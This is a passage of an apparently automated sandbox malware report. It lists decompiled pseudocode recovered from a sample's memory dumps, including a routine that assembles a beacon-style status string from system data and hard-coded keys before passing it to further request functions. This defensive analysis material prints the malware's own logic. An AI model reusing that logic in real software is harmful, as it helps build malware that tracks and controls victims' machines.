                            				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                            				asm("rol edx, 0xa");
                            				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                            				asm("rol esi, 0xf");
                            				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                            				asm("ror ecx, 0xb");
                            				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                            				asm("rol eax, 0x6");
                            				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                            				asm("rol edx, 0xa");
                            				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                            				asm("rol esi, 0xf");
                            				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                            				asm("ror ecx, 0xb");
                            				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                            				asm("rol eax, 0x6");
                            				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                            				asm("rol edx, 0xa");
                            				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                            				asm("rol esi, 0xf");
                            				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                            				asm("ror edi, 0xb");
                            				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                            				asm("rol eax, 0x6");
                            				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                            				asm("rol edx, 0xa");
                            				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                            				_t399 = _a4;
                            				asm("rol esi, 0xf");
                            				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                            				 *_t399 =  *_t399 + _t259;
                            				asm("ror eax, 0xb");
                            				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                            				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                            				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                            				return memset( &_v76, 0, 0x40);
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: da50312a0738fb8208467b0dc573d7b64c48983018d811ed3d5c943799986d32
                            • Instruction ID: c3ad9726d24f60518b4868bad7ba5b001e3f5ac6d322e7d405a630434d7b6e91
                            • Opcode Fuzzy Hash: da50312a0738fb8208467b0dc573d7b64c48983018d811ed3d5c943799986d32
                            • Instruction Fuzzy Hash: B122837BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F1B2A9(long _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				short* _v32;
                            				void _v36;
                            				void* _t57;
                            				signed int _t58;
                            				signed int _t61;
                            				signed int _t62;
                            				void* _t63;
                            				signed int* _t68;
                            				intOrPtr* _t69;
                            				intOrPtr* _t71;
                            				intOrPtr _t72;
                            				intOrPtr _t75;
                            				void* _t76;
                            				signed int _t77;
                            				void* _t78;
                            				void _t80;
                            				signed int _t81;
                            				signed int _t84;
                            				signed int _t86;
                            				short* _t87;
                            				void* _t89;
                            				signed int* _t90;
                            				long _t91;
                            				signed int _t93;
                            				signed int _t94;
                            				signed int _t100;
                            				signed int _t102;
                            				void* _t104;
                            				long _t108;
                            				signed int _t110;
                            
                            				_t108 = _a4;
                            				_t76 =  *(_t108 + 8);
                            				if((_t76 & 0x00000003) != 0) {
                            					L3:
                            					return 0;
                            				}
                            				_a4 =  *[fs:0x4];
                            				_v8 =  *[fs:0x8];
                            				if(_t76 < _v8 || _t76 >= _a4) {
                            					_t102 =  *(_t108 + 0xc);
                            					__eflags = _t102 - 0xffffffff;
                            					if(_t102 != 0xffffffff) {
                            						_t91 = 0;
                            						__eflags = 0;
                            						_a4 = 0;
                            						_t57 = _t76;
                            						do {
                            							_t80 =  *_t57;
                            							__eflags = _t80 - 0xffffffff;
                            							if(_t80 == 0xffffffff) {
                            								goto L9;
                            							}
                            							__eflags = _t80 - _t91;
                            							if(_t80 >= _t91) {
                            								L20:
                            								_t63 = 0;
                            								L60:
                            								return _t63;
                            							}
                            							L9:
                            							__eflags =  *(_t57 + 4);
                            							if( *(_t57 + 4) != 0) {
                            								_t12 =  &_a4;
                            								 *_t12 = _a4 + 1;
                            								__eflags =  *_t12;
                            							}
                            							_t91 = _t91 + 1;
                            							_t57 = _t57 + 0xc;
                            							__eflags = _t91 - _t102;
                            						} while (_t91 <= _t102);
                            						__eflags = _a4;
                            						if(_a4 == 0) {
                            							L15:
                            							_t81 =  *0xf1d310; // 0x0
                            							_t110 = _t76 & 0xfffff000;
                            							_t58 = 0;
                            							__eflags = _t81;
                            							if(_t81 <= 0) {
                            								L18:
                            								_t104 = _t102 | 0xffffffff;
                            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                            								__eflags = _t61;
                            								if(_t61 < 0) {
                            									_t62 = 0;
                            									__eflags = 0;
                            								} else {
                            									_t62 = _a4;
                            								}
                            								__eflags = _t62;
                            								if(_t62 == 0) {
                            									L59:
                            									_t63 = _t104;
                            									goto L60;
                            								} else {
                            									__eflags = _v12 - 0x1000000;
                            									if(_v12 != 0x1000000) {
                            										goto L59;
                            									}
                            									__eflags = _v16 & 0x000000cc;
                            									if((_v16 & 0x000000cc) == 0) {
                            										L46:
                            										_t63 = 1;
                            										 *0xf1d358 = 1;
                            										__eflags =  *0xf1d358;
                            										if( *0xf1d358 != 0) {
                            											goto L60;
                            										}
                            										_t84 =  *0xf1d310; // 0x0
                            										__eflags = _t84;
                            										_t93 = _t84;
                            										if(_t84 <= 0) {
                            											L51:
                            											__eflags = _t93;
                            											if(_t93 != 0) {
                            												L58:
                            												 *0xf1d358 = 0;
                            												goto L5;
                            											}
                            											_t77 = 0xf;
                            											__eflags = _t84 - _t77;
                            											if(_t84 <= _t77) {
                            												_t77 = _t84;
                            											}
                            											_t94 = 0;
                            											__eflags = _t77;
                            											if(_t77 < 0) {
                            												L56:
                            												__eflags = _t84 - 0x10;
                            												if(_t84 < 0x10) {
                            													_t86 = _t84 + 1;
                            													__eflags = _t86;
                            													 *0xf1d310 = _t86;
                            												}
                            												goto L58;
                            											} else {
                            												do {
                            													_t68 = 0xf1d318 + _t94 * 4;
                            													_t94 = _t94 + 1;
                            													__eflags = _t94 - _t77;
                            													 *_t68 = _t110;
                            													_t110 =  *_t68;
                            												} while (_t94 <= _t77);
                            												goto L56;
                            											}
                            										}
                            										_t69 = 0xf1d314 + _t84 * 4;
                            										while(1) {
                            											__eflags =  *_t69 - _t110;
                            											if( *_t69 == _t110) {
                            												goto L51;
                            											}
                            											_t93 = _t93 - 1;
                            											_t69 = _t69 - 4;
                            											__eflags = _t93;
                            											if(_t93 > 0) {
                            												continue;
                            											}
                            											goto L51;
                            										}
                            										goto L51;
                            									}
                            									_t87 = _v32;
                            									__eflags =  *_t87 - 0x5a4d;
                            									if( *_t87 != 0x5a4d) {
                            										goto L59;
                            									}
                            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                            									__eflags =  *_t71 - 0x4550;
                            									if( *_t71 != 0x4550) {
                            										goto L59;
                            									}
                            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                            										goto L59;
                            									}
                            									_t78 = _t76 - _t87;
                            									__eflags =  *((short*)(_t71 + 6));
                            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                            									if( *((short*)(_t71 + 6)) <= 0) {
                            										goto L59;
                            									}
                            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                            									__eflags = _t78 - _t72;
                            									if(_t78 < _t72) {
                            										goto L46;
                            									}
                            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                            										goto L46;
                            									}
                            									__eflags =  *(_t89 + 0x27) & 0x00000080;
                            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                            										goto L20;
                            									}
                            									goto L46;
                            								}
                            							} else {
                            								goto L16;
                            							}
                            							while(1) {
                            								L16:
                            								__eflags =  *((intOrPtr*)(0xf1d318 + _t58 * 4)) - _t110;
                            								if( *((intOrPtr*)(0xf1d318 + _t58 * 4)) == _t110) {
                            									break;
                            								}
                            								_t58 = _t58 + 1;
                            								__eflags = _t58 - _t81;
                            								if(_t58 < _t81) {
                            									continue;
                            								}
                            								goto L18;
                            							}
                            							__eflags = _t58;
                            							if(_t58 <= 0) {
                            								goto L5;
                            							}
                            							 *0xf1d358 = 1;
                            							__eflags =  *0xf1d358;
                            							if( *0xf1d358 != 0) {
                            								goto L5;
                            							}
                            							__eflags =  *((intOrPtr*)(0xf1d318 + _t58 * 4)) - _t110;
                            							if( *((intOrPtr*)(0xf1d318 + _t58 * 4)) == _t110) {
                            								L32:
                            								_t100 = 0;
                            								__eflags = _t58;
                            								if(_t58 < 0) {
                            									L34:
                            									 *0xf1d358 = 0;
                            									goto L5;
                            								} else {
                            									goto L33;
                            								}
                            								do {
                            									L33:
                            									_t90 = 0xf1d318 + _t100 * 4;
                            									_t100 = _t100 + 1;
                            									__eflags = _t100 - _t58;
                            									 *_t90 = _t110;
                            									_t110 =  *_t90;
                            								} while (_t100 <= _t58);
                            								goto L34;
                            							}
                            							_t25 = _t81 - 1; // -1
                            							_t58 = _t25;
                            							__eflags = _t58;
                            							if(_t58 < 0) {
                            								L28:
                            								__eflags = _t81 - 0x10;
                            								if(_t81 < 0x10) {
                            									_t81 = _t81 + 1;
                            									__eflags = _t81;
                            									 *0xf1d310 = _t81;
                            								}
                            								_t28 = _t81 - 1; // 0x0
                            								_t58 = _t28;
                            								goto L32;
                            							} else {
                            								goto L25;
                            							}
                            							while(1) {
                            								L25:
                            								__eflags =  *((intOrPtr*)(0xf1d318 + _t58 * 4)) - _t110;
                            								if( *((intOrPtr*)(0xf1d318 + _t58 * 4)) == _t110) {
                            									break;
                            								}
                            								_t58 = _t58 - 1;
                            								__eflags = _t58;
                            								if(_t58 >= 0) {
                            									continue;
                            								}
                            								break;
                            							}
                            							__eflags = _t58;
                            							if(__eflags >= 0) {
                            								if(__eflags == 0) {
                            									goto L34;
                            								}
                            								goto L32;
                            							}
                            							goto L28;
                            						}
                            						_t75 =  *((intOrPtr*)(_t108 - 8));
                            						__eflags = _t75 - _v8;
                            						if(_t75 < _v8) {
                            							goto L20;
                            						}
                            						__eflags = _t75 - _t108;
                            						if(_t75 >= _t108) {
                            							goto L20;
                            						}
                            						goto L15;
                            					}
                            					L5:
                            					_t63 = 1;
                            					goto L60;
                            				} else {
                            					goto L3;
                            				}
                            			}
                            0x00f1b464
                            0x00000000
                            0x00000000
                            0x00f1b466
                            0x00f1b46c
                            0x00f1b46e
                            0x00f1b470
                            0x00f1b485
                            0x00f1b485
                            0x00f1b487
                            0x00f1b4b6
                            0x00f1b4bd
                            0x00000000
                            0x00f1b4bd
                            0x00f1b48b
                            0x00f1b48c
                            0x00f1b48e
                            0x00f1b490
                            0x00f1b490
                            0x00f1b492
                            0x00f1b494
                            0x00f1b496
                            0x00f1b4aa
                            0x00f1b4aa
                            0x00f1b4ad
                            0x00f1b4af
                            0x00f1b4af
                            0x00f1b4b0
                            0x00f1b4b0
                            0x00000000
                            0x00f1b498
                            0x00f1b498
                            0x00f1b498
                            0x00f1b4a1
                            0x00f1b4a2
                            0x00f1b4a4
                            0x00f1b4a6
                            0x00f1b4a6
                            0x00000000
                            0x00f1b498
                            0x00f1b496
                            0x00f1b472
                            0x00f1b479
                            0x00f1b479
                            0x00f1b47b
                            0x00000000
                            0x00000000
                            0x00f1b47d
                            0x00f1b47e
                            0x00f1b481
                            0x00f1b483
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b483
                            0x00000000
                            0x00f1b479
                            0x00f1b3fc
                            0x00f1b3ff
                            0x00f1b404
                            0x00000000
                            0x00000000
                            0x00f1b40d
                            0x00f1b40f
                            0x00f1b415
                            0x00000000
                            0x00000000
                            0x00f1b41b
                            0x00f1b421
                            0x00000000
                            0x00000000
                            0x00f1b427
                            0x00f1b429
                            0x00f1b432
                            0x00f1b436
                            0x00000000
                            0x00000000
                            0x00f1b43c
                            0x00f1b43f
                            0x00f1b441
                            0x00000000
                            0x00000000
                            0x00f1b448
                            0x00f1b44a
                            0x00000000
                            0x00000000
                            0x00f1b44c
                            0x00f1b450
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b450
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b33b
                            0x00f1b33b
                            0x00f1b33b
                            0x00f1b342
                            0x00000000
                            0x00000000
                            0x00f1b344
                            0x00f1b345
                            0x00f1b347
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b347
                            0x00f1b36f
                            0x00f1b371
                            0x00000000
                            0x00000000
                            0x00f1b381
                            0x00f1b383
                            0x00f1b385
                            0x00000000
                            0x00000000
                            0x00f1b38b
                            0x00f1b392
                            0x00f1b3be
                            0x00f1b3be
                            0x00f1b3c0
                            0x00f1b3c2
                            0x00f1b3d6
                            0x00f1b3d8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b3c4
                            0x00f1b3c4
                            0x00f1b3c4
                            0x00f1b3cd
                            0x00f1b3ce
                            0x00f1b3d0
                            0x00f1b3d2
                            0x00f1b3d2
                            0x00000000
                            0x00f1b3c4
                            0x00f1b394
                            0x00f1b394
                            0x00f1b397
                            0x00f1b399
                            0x00f1b3ab
                            0x00f1b3ab
                            0x00f1b3ae
                            0x00f1b3b0
                            0x00f1b3b0
                            0x00f1b3b1
                            0x00f1b3b1
                            0x00f1b3b7
                            0x00f1b3b7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b39b
                            0x00f1b39b
                            0x00f1b39b
                            0x00f1b3a2
                            0x00000000
                            0x00000000
                            0x00f1b3a4
                            0x00f1b3a4
                            0x00f1b3a5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b3a5
                            0x00f1b3a7
                            0x00f1b3a9
                            0x00f1b3bc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b3bc
                            0x00000000
                            0x00f1b3a9
                            0x00f1b31b
                            0x00f1b31e
                            0x00f1b321
                            0x00000000
                            0x00000000
                            0x00f1b323
                            0x00f1b325
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b325
                            0x00f1b2ea
                            0x00f1b2ec
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00F1B35A
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: MemoryQueryVirtual
                            • String ID:
                            • API String ID: 2850889275-0
                            • Opcode ID: e7f0a49e83ca54f277062a8727afcfa37858e672e3a333cd45a55463d0a93427
                            • Instruction ID: 3cc49c4673f95b1103627a28f0cb1742743b54cd93c1579c5d0f0a545696421c
                            • Opcode Fuzzy Hash: e7f0a49e83ca54f277062a8727afcfa37858e672e3a333cd45a55463d0a93427
                            • Instruction Fuzzy Hash: 3A61E130A00646DFDB29CF29C8906E973A5EF85724F24C529E866C7296E735DCC1F740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E00F1B084(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                            				intOrPtr _v8;
                            				char _v12;
                            				void* __ebp;
                            				signed int* _t43;
                            				char _t44;
                            				void* _t46;
                            				void* _t49;
                            				intOrPtr* _t53;
                            				void* _t54;
                            				void* _t65;
                            				long _t66;
                            				signed int* _t80;
                            				signed int* _t82;
                            				void* _t84;
                            				signed int _t86;
                            				void* _t89;
                            				void* _t95;
                            				void* _t96;
                            				void* _t99;
                            				void* _t106;
                            
                            				_t43 = _t84;
                            				_t65 = __ebx + 2;
                            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                            				_t89 = _t95;
                            				_t96 = _t95 - 8;
                            				_push(_t65);
                            				_push(_t84);
                            				_push(_t89);
                            				asm("cld");
                            				_t66 = _a8;
                            				_t44 = _a4;
                            				if(( *(_t44 + 4) & 0x00000006) != 0) {
                            					_push(_t89);
                            					E00F1B1EF(_t66 + 0x10, _t66, 0xffffffff);
                            					_t46 = 1;
                            				} else {
                            					_v12 = _t44;
                            					_v8 = _a12;
                            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                            					_t86 =  *(_t66 + 0xc);
                            					_t80 =  *(_t66 + 8);
                            					_t49 = E00F1B2A9(_t66);
                            					_t99 = _t96 + 4;
                            					if(_t49 == 0) {
                            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                            						goto L11;
                            					} else {
                            						while(_t86 != 0xffffffff) {
                            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                            							if(_t53 == 0) {
                            								L8:
                            								_t80 =  *(_t66 + 8);
                            								_t86 = _t80[_t86 + _t86 * 2];
                            								continue;
                            							} else {
                            								_t54 =  *_t53();
                            								_t89 = _t89;
                            								_t86 = _t86;
                            								_t66 = _a8;
                            								_t55 = _t54;
                            								_t106 = _t54;
                            								if(_t106 == 0) {
                            									goto L8;
                            								} else {
                            									if(_t106 < 0) {
                            										_t46 = 0;
                            									} else {
                            										_t82 =  *(_t66 + 8);
                            										E00F1B194(_t55, _t66);
                            										_t89 = _t66 + 0x10;
                            										E00F1B1EF(_t89, _t66, 0);
                            										_t99 = _t99 + 0xc;
                            										E00F1B28B(_t82[2]);
                            										 *(_t66 + 0xc) =  *_t82;
                            										_t66 = 0;
                            										_t86 = 0;
                            										 *(_t82[2])(1);
                            										goto L8;
                            									}
                            								}
                            							}
                            							goto L13;
                            						}
                            						L11:
                            						_t46 = 1;
                            					}
                            				}
                            				L13:
                            				return _t46;
                            			}
                            0x00f1b088
                            0x00f1b089
                            0x00f1b08a
                            0x00f1b08d
                            0x00f1b08f
                            0x00f1b092
                            0x00f1b093
                            0x00f1b095
                            0x00f1b096
                            0x00f1b097
                            0x00f1b09a
                            0x00f1b0a4
                            0x00f1b155
                            0x00f1b15c
                            0x00f1b165
                            0x00f1b0aa
                            0x00f1b0aa
                            0x00f1b0b0
                            0x00f1b0b6
                            0x00f1b0b9
                            0x00f1b0bc
                            0x00f1b0c0
                            0x00f1b0c5
                            0x00f1b0ca
                            0x00f1b14a
                            0x00000000
                            0x00f1b0cc
                            0x00f1b0cc
                            0x00f1b0d8
                            0x00f1b0da
                            0x00f1b135
                            0x00f1b135
                            0x00f1b13b
                            0x00000000
                            0x00f1b0dc
                            0x00f1b0eb
                            0x00f1b0ed
                            0x00f1b0ee
                            0x00f1b0ef
                            0x00f1b0f2
                            0x00f1b0f2
                            0x00f1b0f4
                            0x00000000
                            0x00f1b0f6
                            0x00f1b0f6
                            0x00f1b140
                            0x00f1b0f8
                            0x00f1b0f8
                            0x00f1b0fc
                            0x00f1b104
                            0x00f1b109
                            0x00f1b10e
                            0x00f1b11a
                            0x00f1b122
                            0x00f1b129
                            0x00f1b12f
                            0x00f1b133
                            0x00000000
                            0x00f1b133
                            0x00f1b0f6
                            0x00f1b0f4
                            0x00000000
                            0x00f1b0da
                            0x00f1b14e
                            0x00f1b14e
                            0x00f1b14e
                            0x00f1b0ca
                            0x00f1b16a
                            0x00f1b171

                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction ID: d1dd72fc5aba69997512db02e6cab8eeb29679578801f8e4a16faaf978628ebc
                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction Fuzzy Hash: E621D632900204EBCB14EF68CCD49ABB7A5FF48320B068068ED199B245E730F955DBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E00F17132(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                            				void* _v8;
                            				signed int _v12;
                            				void* _v16;
                            				void* _v20;
                            				void* _v24;
                            				void* _v28;
                            				void* __ebx;
                            				void* __edi;
                            				long _t59;
                            				intOrPtr _t60;
                            				intOrPtr _t61;
                            				intOrPtr _t62;
                            				intOrPtr _t63;
                            				intOrPtr _t64;
                            				void* _t67;
                            				intOrPtr _t68;
                            				int _t71;
                            				void* _t72;
                            				void* _t73;
                            				void* _t75;
                            				void* _t78;
                            				intOrPtr _t82;
                            				intOrPtr _t86;
                            				intOrPtr* _t88;
                            				void* _t94;
                            				intOrPtr _t100;
                            				signed int _t104;
                            				char** _t106;
                            				int _t109;
                            				intOrPtr* _t112;
                            				intOrPtr* _t114;
                            				intOrPtr* _t116;
                            				intOrPtr* _t118;
                            				intOrPtr _t121;
                            				intOrPtr _t126;
                            				int _t130;
                            				CHAR* _t132;
                            				intOrPtr _t133;
                            				void* _t134;
                            				void* _t143;
                            				int _t144;
                            				void* _t145;
                            				intOrPtr _t146;
                            				void* _t148;
                            				long _t152;
                            				intOrPtr* _t153;
                            				intOrPtr* _t154;
                            				intOrPtr* _t157;
                            				void* _t158;
                            				void* _t160;
                            
                            				_t143 = __edx;
                            				_t134 = __ecx;
                            				_t59 = __eax;
                            				_v12 = 8;
                            				if(__eax == 0) {
                            					_t59 = GetTickCount();
                            				}
                            				_t60 =  *0xf1d018; // 0xad359284
                            				asm("bswap eax");
                            				_t61 =  *0xf1d014; // 0x3a87c8cd
                            				_t132 = _a16;
                            				asm("bswap eax");
                            				_t62 =  *0xf1d010; // 0xd8d2f808
                            				asm("bswap eax");
                            				_t63 =  *0xf1d00c; // 0x8f8f86c2
                            				asm("bswap eax");
                            				_t64 =  *0xf1d2b8; // 0x48da5a8
                            				_t144 = wsprintfA(_t132, _t64 + 0xf1e633, 3, 0x3f87e, _t63, _t62, _t61, _t60,  *0xf1d02c,  *0xf1d004, _t59);
                            				_t67 = E00F18DA6();
                            				_t68 =  *0xf1d2b8; // 0x48da5a8
                            				_t71 = wsprintfA(_t144 + _t132, _t68 + 0xf1e673, _t67);
                            				_t160 = _t158 + 0x38;
                            				_t145 = _t144 + _t71;
                            				_t72 = E00F140AC(_t134);
                            				_t133 = __imp__;
                            				_v8 = _t72;
                            				if(_t72 != 0) {
                            					_t126 =  *0xf1d2b8; // 0x48da5a8
                            					_t130 = wsprintfA(_a16 + _t145, _t126 + 0xf1e8b2, _t72);
                            					_t160 = _t160 + 0xc;
                            					_t145 = _t145 + _t130;
                            					HeapFree( *0xf1d270, 0, _v8);
                            				}
                            				_t73 = E00F18941();
                            				_v8 = _t73;
                            				if(_t73 != 0) {
                            					_t121 =  *0xf1d2b8; // 0x48da5a8
                            					wsprintfA(_t145 + _a16, _t121 + 0xf1e885, _t73);
                            					_t160 = _t160 + 0xc;
                            					HeapFree( *0xf1d270, 0, _v8);
                            				}
                            				_t146 =  *0xf1d35c; // 0x57f95b0
                            				_t75 = E00F13FB8(0xf1d00a, _t146 + 4);
                            				_t152 = 0;
                            				_v20 = _t75;
                            				if(_t75 == 0) {
                            					L26:
                            					HeapFree( *0xf1d270, _t152, _a16);
                            					return _v12;
                            				} else {
                            					_t78 = RtlAllocateHeap( *0xf1d270, 0, 0x800);
                            					_v8 = _t78;
                            					if(_t78 == 0) {
                            						L25:
                            						HeapFree( *0xf1d270, _t152, _v20);
                            						goto L26;
                            					}
                            					E00F147EF(GetTickCount());
                            					_t82 =  *0xf1d35c; // 0x57f95b0
                            					__imp__(_t82 + 0x40);
                            					asm("lock xadd [eax], ecx");
                            					_t86 =  *0xf1d35c; // 0x57f95b0
                            					__imp__(_t86 + 0x40);
                            					_t88 =  *0xf1d35c; // 0x57f95b0
                            					_t148 = E00F1A7FB(1, _t143, _a16,  *_t88);
                            					_v28 = _t148;
                            					asm("lock xadd [eax], ecx");
                            					if(_t148 == 0) {
                            						L24:
                            						HeapFree( *0xf1d270, _t152, _v8);
                            						goto L25;
                            					}
                            					StrTrimA(_t148, 0xf1c2ac);
                            					_push(_t148);
                            					_t94 = E00F16F6D();
                            					_v16 = _t94;
                            					if(_t94 == 0) {
                            						L23:
                            						HeapFree( *0xf1d270, _t152, _t148);
                            						goto L24;
                            					}
                            					_t153 = __imp__;
                            					 *_t153(_t148, _a4);
                            					 *_t153(_v8, _v20);
                            					_t154 = __imp__;
                            					 *_t154(_v8, _v16);
                            					_t100 = E00F165F6( *_t154(_v8, _t148), _v8);
                            					_a4 = _t100;
                            					if(_t100 == 0) {
                            						_v12 = 8;
                            						L21:
                            						E00F155F1();
                            						L22:
                            						HeapFree( *0xf1d270, 0, _v16);
                            						_t152 = 0;
                            						goto L23;
                            					}
                            					_t104 = E00F17681(_t133, 0xffffffffffffffff, _t148,  &_v24);
                            					_v12 = _t104;
                            					if(_t104 == 0) {
                            						_t157 = _v24;
                            						_v12 = E00F142E6(_t157, _a4, _a8, _a12);
                            						_t112 =  *((intOrPtr*)(_t157 + 8));
                            						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                            						_t114 =  *((intOrPtr*)(_t157 + 8));
                            						 *((intOrPtr*)( *_t114 + 8))(_t114);
                            						_t116 =  *((intOrPtr*)(_t157 + 4));
                            						 *((intOrPtr*)( *_t116 + 8))(_t116);
                            						_t118 =  *_t157;
                            						 *((intOrPtr*)( *_t118 + 8))(_t118);
                            						E00F16DFA(_t157);
                            					}
                            					if(_v12 != 0x10d2) {
                            						L16:
                            						if(_v12 == 0) {
                            							_t106 = _a8;
                            							if(_t106 != 0) {
                            								_t149 =  *_t106;
                            								_t155 =  *_a12;
                            								wcstombs( *_t106,  *_t106,  *_a12);
                            								_t109 = E00F12F36(_t149, _t149, _t155 >> 1);
                            								_t148 = _v28;
                            								 *_a12 = _t109;
                            							}
                            						}
                            						goto L19;
                            					} else {
                            						if(_a8 != 0) {
                            							L19:
                            							E00F16DFA(_a4);
                            							if(_v12 == 0 || _v12 == 0x10d2) {
                            								goto L22;
                            							} else {
                            								goto L21;
                            							}
                            						}
                            						_v12 = _v12 & 0x00000000;
                            						goto L16;
                            					}
                            				}
                            			}
                            0x00f17132
                            0x00f17132
                            0x00f17132
                            0x00f1713d
                            0x00f17144
                            0x00f17146
                            0x00f17146
                            0x00f17153
                            0x00f1715e
                            0x00f17161
                            0x00f17166
                            0x00f1716f
                            0x00f17172
                            0x00f17177
                            0x00f1717a
                            0x00f1717f
                            0x00f17182
                            0x00f1719b
                            0x00f1719d
                            0x00f171a3
                            0x00f171b3
                            0x00f171b5
                            0x00f171b8
                            0x00f171ba
                            0x00f171c1
                            0x00f171c7
                            0x00f171ca
                            0x00f171cd
                            0x00f171df
                            0x00f171e1
                            0x00f171e7
                            0x00f171f1
                            0x00f171f1
                            0x00f171f3
                            0x00f171fa
                            0x00f171fd
                            0x00f17200
                            0x00f17212
                            0x00f17214
                            0x00f17222
                            0x00f17222
                            0x00f17224
                            0x00f17232
                            0x00f17237
                            0x00f1723b
                            0x00f1723e
                            0x00f173ff
                            0x00f17409
                            0x00f17412
                            0x00f17244
                            0x00f17250
                            0x00f17258
                            0x00f1725b
                            0x00f173f3
                            0x00f173fd
                            0x00000000
                            0x00f173fd
                            0x00f17267
                            0x00f1726c
                            0x00f17275
                            0x00f17286
                            0x00f1728a
                            0x00f17293
                            0x00f17299
                            0x00f172a8
                            0x00f172af
                            0x00f172b8
                            0x00f172be
                            0x00f173e7
                            0x00f173f1
                            0x00000000
                            0x00f173f1
                            0x00f172ca
                            0x00f172d0
                            0x00f172d1
                            0x00f172d8
